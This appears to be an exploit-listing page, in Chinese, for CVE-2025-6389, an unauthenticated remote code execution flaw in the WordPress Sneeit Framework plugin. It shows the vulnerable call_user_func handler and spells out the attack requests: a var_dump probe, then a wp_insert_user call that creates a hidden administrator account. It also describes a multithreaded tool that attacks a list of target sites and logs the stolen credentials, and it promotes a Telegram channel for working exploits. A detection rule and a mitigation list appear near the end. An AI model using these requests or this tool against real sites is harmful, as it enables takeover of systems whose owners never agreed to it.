Sploitus

Exploit for CVE-2025-6389

kitploit · 2026-09-01

Exploit Code

MARKDOWN313 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-NXPLOITED-CVE-2025-6389
# CVE-2025-6389

Sneeit Framework <= 8.3 - 未经验证的远程代码执行漏洞(sneeit_articles_pagination_callback)

root@kitploit:~
    
    
        _______      ________    ___   ___ ___  _____         __ ____   ___   ___  
      / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|       / /|___ \ / _ \ / _ \ 
     | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ / /_  __) | (_) | (_) |
     | |      \ \/ / |  __|______/ /| | | |/ /|___ \______| '_ \|__ < > _ < \__, |
     | |____   \  /  | |____    / /_| |_| / /_ ___) |     | (_) |__) | (_) |  / / 
      \_____|   \/   |______|  |____|\___|/____|____/       \___/____/ \___/  /_/  
    

  


![Telegram](https://img.shields.io/badge/Telegram-KNxploited-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white) ![CVE](https://img.shields.io/badge/CVE-2025--6389-critical?style=for-the-badge&logo=cve&logoColor=white&color=CC0000) ![CVSS](https://img.shields.io/badge/CVSS-9.8%20CRITICAL-red?style=for-the-badge) ![Python](https://img.shields.io/badge/Python-3.8+-blue?style=for-the-badge&logo=python&logoColor=white) ![License](https://img.shields.io/badge/License-Educational%20Only-yellow?style=for-the-badge)

  


> 📡 **不要错过下一次发布。** 在 Telegram 上关注 **@KNxploited** —— 获取最新披露的 CVE、可用漏洞利用程序和顶级安全研究的权威频道。第一时间知晓,第一时间行动。

* * *

## 🧠 概述

**CVE-2025-6389** 是 WordPress 的 **Sneeit Framework** 插件中存在的一个 **CVSS 9.8 严重** 远程代码执行漏洞。

该漏洞存在于 `sneeit_articles_pagination_callback()` 函数中,该函数盲目地将**用户提供的输入** 传递给 PHP 的 `call_user_func()`——未经身份验证的攻击者可以调用任何 PHP 函数并传入任意参数,包括 `wp_insert_user`,从而有效地授予自己**完全管理员权限** 或执行任意服务器端代码。

* * *

## 💀 漏洞深入剖析

根本原因是插件 AJAX 处理程序中错误地使用了 PHP 的 `call_user_func()`:

root@kitploit:~
    
    
    // 注册时未进行身份验证检查
    add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback');
    
    function sneeit_articles_pagination_callback() {
        $callback = $_POST['callback'];  // ← 用户控制的函数名
        $args     = json_decode(stripslashes($_POST['args']), true); // ← 用户控制的参数
    
        // 调用任意 PHP 函数并传入任意参数 — 零验证
        $result = call_user_func($callback, ...$args);
    
        echo $result;
        die();
    }
    

**为何严重:**

  * `wp_ajax_nopriv_*` = **任何人可访问,无需登录**
  * `call_user_func($callback, $args)` = 任意函数调用
  * 攻击者可调用 `var_dump`、`system`、`wp_insert_user`、`eval` 或任何 PHP/WordPress 函数
  * 响应直接返回 — 同时支持**盲注式和显式 RCE**



* * *

## ⚔️ 利用链

root@kitploit:~
    
    
    第 1 步 — 探测 / 指纹识别
    ──────────────────────────────────────────────────────────────────
    POST /wp-admin/admin-ajax.php
      action   = sneeit_articles_pagination
      callback = var_dump
      args     = ["test"]
    
    预期响应 → array(1) { [0]=> string(4) "test" }
      ↓
    确认:call_user_func() 可达且反射输出
    
    ──────────────────────────────────────────────────────────────────
    第 2 步 — 创建管理员账户
    ──────────────────────────────────────────────────────────────────
    POST /wp-admin/admin-ajax.php
      action   = sneeit_articles_pagination
      callback = wp_insert_user
      args     = {"user_login":"Nxploited_XXXX",
                   "user_pass":"xplpass",
                   "user_email":"...",
                   "role":"administrator"}
    
    结果 → 在目标上静默创建新的管理员账户
      ↓
    获得完全 WordPress 管理员面板访问权限 ✔️
    

* * *

## ⚙️ 环境要求

root@kitploit:~
    
    
    pip install requests rich
    

依赖项| 用途  
---|---  
`requests`| 支持会话/代理的 HTTP 请求  
`rich`| 实时终端仪表板、面板、进度条  
`threading`| 并发多目标处理  
`queue`  
  
> 需要 **Python 3.8+** 。类型提示使用了 3.9+ 引入的 `tuple[...]` 语法 — 建议使用 3.9+ 以获得最佳兼容性。

* * *

## 📂 文件结构

root@kitploit:~
    
    
    CVE-2025-6389/
    ├── CVE-2025-6389.py          # 主漏洞利用脚本
    ├── list.txt                  # 目标 URL — 每行一个
    ├── success_results.txt       # 自动生成:成功目标 + 凭据
    └── debug_responses/          # 自动生成:用于调试的原始服务器响应
        └── <target>.resp.txt
    

* * *

## 🚀 使用方法

### 第 1 步 — 准备目标

创建 `list.txt`,每行一个 URL:

root@kitploit:~
    
    
    https://target1.com
    https://target2.com
    http://target3.com
    

> 没有 `http://` 或 `https://` 的 URL 将自动添加 `http://` 前缀。

* * *

### 第 2 步 — 运行漏洞利用

root@kitploit:~
    
    
    python CVE-2025-6389.py
    

系统会提示您:

root@kitploit:~
    
    
    目标文件名(默认 list.txt):list.txt
    线程数(默认 10):20
    

* * *

### 第 3 步 — 实时仪表板

脚本将启动一个**实时 Rich 仪表板** ,显示:

root@kitploit:~
    
    
    ┌─────────────────────────────────────────────────────────────────────┐
    │  [ASCII 横幅]                                                        │
    ├──────────────────────────────┬──────────────────────────────────────┤
    │  信息                        │  统计                                │
    │  用法:将目标放入...        │  目标总数:  150                     │
    │  线程:20                    │  已处理:    87                     │
    │  密码:xplpass               │  成功:      12                     │
    │  成功日志:success...        │  失败:      75                     │
    │  调试目录:debug_responses   │  已用时间:  00:01:43               │
    ├──────────────────────────────┴──────────────────────────────────────┤
    │  最近结果                                                           │
    │  时间      目标                              结果                   │
    │  14:23:01 https://victim.com                  SUCCESS               │
    │  14:23:03 https://example.net                 FAIL                  │
    └─────────────────────────────────────────────────────────────────────┘
    

* * *

### 第 4 步 — 查看结果

**成功的利用** 结果保存到 `success_results.txt`:

root@kitploit:~
    
    
    https://victim.com | 用户名: Nxploited_4821 | 密码: xplpass | 邮箱: some-email@example.com
    

**调试响应** (针对失败目标)保存到 `debug_responses/` 目录:

root@kitploit:~
    
    
    debug_responses/
    └── https___victim.com.resp.txt   ← 用于分析的原始服务器响应
    

* * *

## 🖥️ 脚本参数参考

* * *

## 📊 检测特征

该漏洞利用产生以下网络特征 — 对防御者和 WAF 规则编写者有用:

root@kitploit:~
    
    
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    
    action=sneeit_articles_pagination&callback=<FUNCTION>&args=<JSON>
    

**WAF / IDS 规则(伪代码):**

root@kitploit:~
    
    
    IF request.method == POST
    AND request.path  == "/wp-admin/admin-ajax.php"
    AND request.body CONTAINS "sneeit_articles_pagination"
    AND request.body CONTAINS "callback"
    THEN BLOCK + ALERT
    

* * *

## 🛡️ 缓解与修复

如果您是**网站所有者、开发者或防御者** ,请立即采取以下措施:

  * ✅ **更新** Sneeit Framework 到 **8.3 以上** 的版本(如果已有补丁)
  * ✅ **停用并删除** 该插件,直到确认存在已修补版本
  * ✅ **审计** 最近创建的 WordPress 管理员账户,查找未授权条目
  * ✅ **实施** 服务器端输入验证 — 切勿将用户输入传递给 `call_user_func()`
  * ✅ **阻止** 未经验证的 POST 请求到 `admin-ajax.php`,在 WAF/防火墙层面
  * ✅ **监控** 服务器日志中 `sneeit_articles_pagination` AJAX 动作调用
  * ✅ **启用** 所有现有管理员账户的双因素认证,作为遏制措施



* * *

## ⚠️ 免责声明

root@kitploit:~
    
    
    本工具严格仅供教育、授权渗透测试和安全研究目的使用。
    
    下载、运行或修改此脚本即表示您明确同意:
    
      • 您已获得所测试系统的所有者明确书面授权。无例外。
    
      • 您在受控的实验室内或正式划定范围内的授权活动中进行操作。
    
      • 您不会针对任何未经法律许可测试的系统、网络或基础设施部署本工具。
    
      • Nxploited 及所有贡献者对因使用本工具引起的任何未经授权的使用、损害、
        数据丢失、法律诉讼或刑事起诉不承担任何责任。
    
    未经授权使用此漏洞利用程序属于刑事犯罪,违反:
      — 美国计算机欺诈与滥用法案 (CFAA)
      — 英国计算机滥用法案 (CMA)
      — 欧盟关于攻击信息系统的指令 2013/40/EU
      — 以及所有等效的国家和国际网络犯罪法律。
    
    请负责任地使用。道德地黑客。负责任地披露。
    

* * *

## 👤 作者

|   
---|---  
**代号**|  Nxploited (Khaled Alenazi)  
**Telegram**| @KNxploited  
**GitHub**| github.com/Nxploited  
  
  


> 🔔 **在 Telegram 上关注@KNxploited** 这是真正漏洞利用程序首发之地——CVE、零日漏洞、PoC 和深入的漏洞研究。定期更新。保持敏锐。

* * *

由 **Nxploited** 精心制作 · 仅限授权安全研究 · CVSS 9.8 严重